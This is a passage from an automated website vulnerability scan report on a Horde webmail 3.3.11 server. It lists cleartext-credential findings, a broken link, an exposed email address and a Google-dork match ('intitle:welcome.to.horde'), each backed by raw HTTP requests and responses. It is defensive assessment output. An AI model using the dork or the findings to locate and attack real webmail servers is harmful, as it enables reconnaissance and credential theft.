GET /imp/login.php?app=imp&horde_logout_token=YOAPl3vWsuqm_TL_FXgl0owpZmM&imapuser=iyeojwka&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (8d2af24adeca98940d4ca72de057c259) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Arabic%20(Syria)%20%26%23x202e;(%26%23x0627;%26%23x0644;%26%23x0639;%26%23x0631;%26%23x0628;%26%23x064a;%26%23x0629;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT |
||||||||||||||||||
Acunetix Website Audit | 38 |
Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT |
||||||||||||||||||
/imp/login.php (92d3a0adc0d0c42811b54244a0913050) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=81ZHbgsWu6SDUtUtwCSI2FaJ-BE&imapuser=hurcfetk&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10395 |
||||||||||||||||||
/imp/login.php (98144b1b8c67561c22adeba83a43a266) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=py6BVY4d7g6gx0ofFWB1kQ6hRdY&imapuser=sjtjgfnc&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET |
||||||||||||||||||
Acunetix Website Audit | 39 |
Date: Sun, 22 May 2011 15:13:09 GMT | ||||||||||||||||||
/imp/login.php (9b42f8057a8701d8c0448698f0d7a0ff) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=Bahasa%20Indonesia HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (a12e6bd4443144c1b8c23ea00c2ffe38) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=Catal%26%23xe0; HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (a2ba6948a038d7a3a440afb1fc9eceed) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Acunetix Website Audit | 40 |
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x010c;esky HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (b0db092b89360e30820e995c6abbbc83) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=g9u7H-78CHQyg9CQNPHaIUumuT8&imapuser=grwtfvif&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10395 |
||||||||||||||||||
/imp/login.php (b3cb8470038a18bddad7a22934963f28) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=UVdJ_qdy2FCjlafyUTTJOJOjkUM&imapuser=tjmxnsfk&logout_reason=badlogin&server=pop HTTP/1.1 | ||||||||||||||||||
Acunetix Website Audit | 41 |
Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (b6658f01c57b6184aa9e241e81e8115a) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=X15QsD-1zAYbNp-KXZCaCs97Ev4&imapuser=uwbkfapt&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:09 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (b80345ac9e258e2e5fc0788690b47d67) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=Bosanski HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php |
||||||||||||||||||
Acunetix Website Audit | 42 |
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/login.php (eb39b850bb307c9b610a48be2af0d636) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=WpLNAAqx7QwZs-m-mA-TXAsylgU&imapuser=gmbrshlo&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (f9867d029cae700bee7e0e09c3c5e9bc) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?app=imp&horde_logout_token=5HmQhu81IJ8NQd3wg4Xsyucnj7Q&imapuser=lwnnwvll&logout_reason=badlogin&server=pop HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host |
||||||||||||||||||
Acunetix Website Audit | 43 |
Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:13 GMT Content-Length: 10396 |
||||||||||||||||||
/imp/login.php (fa2cb8a65862e58974030595118192cb) | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php?new_lang=%26%23x202d;Arabic%20(Oman)%20%26%23x202e;(%26%23x0627;%26%23x0644;%26%23x0639;%26%23x0631;%26%23x0628;%26%23x064a;%26%23x0629;) HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:21 GMT Content-Length: 10190 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/redirect.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/redirect.php HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=cc98ab8bb445fe090d5f7b594f58e208; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
Acunetix Website Audit | 44 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:03 GMT Content-Length: 10193 |
||||||||||||||||||
/imp/test.php | ||||||||||||||||||
Details | ||||||||||||||||||
It seemes that user credentials are sent to /imp/test.php in clear text. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/test.php HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/ Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 16:36:45 GMT Content-Length: 4560 |
||||||||||||||||||
Broken links | ||||||||||||||||||
![]() |
||||||||||||||||||
Severity | Informational | |||||||||||||||||
Type | Informational | |||||||||||||||||
Reported by module | Crawler | |||||||||||||||||
Description | ||||||||||||||||||
A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error. This page was linked from the website but it is inaccessible. | ||||||||||||||||||
Impact | ||||||||||||||||||
Problems navigating the site. | ||||||||||||||||||
Recommendation | ||||||||||||||||||
Remove the links to this file or make it accessible. | ||||||||||||||||||
Affected items | ||||||||||||||||||
/imp/function.session-regenerate-id | ||||||||||||||||||
Details | ||||||||||||||||||
No details are available. | ||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/function.session-regenerate-id HTTP/1.1 Pragma: no-cache |
||||||||||||||||||
Acunetix Website Audit | 45 |
Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:08 GMT Content-Length: 1245 |
||||||||||||||||||
Email address found | ||||||||||||||||||
![]() |
||||||||||||||||||
Severity | Informational | |||||||||||||||||
Type | Informational | |||||||||||||||||
Reported by module | Scripting (Text_Search.script) | |||||||||||||||||
Description | ||||||||||||||||||
One or more email addresses have been found on this page. The majority of spam comes from email addresses harvested off the internet. The spam-bots (also known as email harvesters and email extractors) are programs that scour the internet looking for email addresses on any website they come across. Spambot programs look for strings like myname@mydomain.com and then record any addresses found. | ||||||||||||||||||
Impact | ||||||||||||||||||
Email addresses posted on Web sites may attract spam. | ||||||||||||||||||
Recommendation | ||||||||||||||||||
Check references for details on how to solve this problem. | ||||||||||||||||||
Affected items | ||||||||||||||||||
/imp/themes/wps_sober/screen.css | ||||||||||||||||||
Details | ||||||||||||||||||
Pattern found: md@webbplatsen.se |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/themes/wps_sober/screen.css HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK | ||||||||||||||||||
Acunetix Website Audit | 46 |
Content-Type: text/css Last-Modified: Tue, 11 Apr 2006 16:27:08 GMT Accept-Ranges: bytes ETag: "0d6dbc6845dc61:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:05 GMT |
||||||||||||||||||
/themes/wps_sober/screen.css | ||||||||||||||||||
Details | ||||||||||||||||||
Pattern found: md@webbplatsen.se |
||||||||||||||||||
Request | ||||||||||||||||||
GET /themes/wps_sober/screen.css HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Content-Type: text/css Last-Modified: Tue, 21 Dec 2010 19:25:16 GMT Accept-Ranges: bytes ETag: "076d8cb44a1cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:05 GMT Content-Length: 19078 |
||||||||||||||||||
GHDB: Horde Mail | ||||||||||||||||||
![]() |
||||||||||||||||||
Severity | Informational | |||||||||||||||||
Type | Informational | |||||||||||||||||
Reported by module | GHDB | |||||||||||||||||
Description | ||||||||||||||||||
The description for this alert is contributed by the GHDB community, it may contain inappropriate language. Category : Advisories and Vulnerabilities Horde Mail is web based email software, great for checking messages on the road. Several vulnerabilities were reported to Security Focus. The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community. |
||||||||||||||||||
Impact | ||||||||||||||||||
Not available. Check description. | ||||||||||||||||||
Acunetix Website Audit | 47 |
Recommendation | ||||||||||||||||||
Not available. Check description. | ||||||||||||||||||
Affected items | ||||||||||||||||||
/imp | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/ HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/ Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:11 GMT Content-Length: 10191 |
||||||||||||||||||
/imp/index.php | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/index.php HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:11 GMT |
||||||||||||||||||
Acunetix Website Audit | 48 |
/imp/login.php | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
||||||||||||||||||
Request | ||||||||||||||||||
GET /imp/login.php HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Acunetix-Aspect-Queries: filelist;aspectalerts Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Language Server: Microsoft-IIS/7.5 Set-Cookie: Horde=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host Set-Cookie: imp_key=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host Set-Cookie: auth_key=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:03 GMT Content-Length: 10312 |
||||||||||||||||||
/imp/login.php (0543eee9a9fc90cdbcebb4184dc0f436) | ||||||||||||||||||
Details | ||||||||||||||||||
We found intitle:welcome.to.horde |
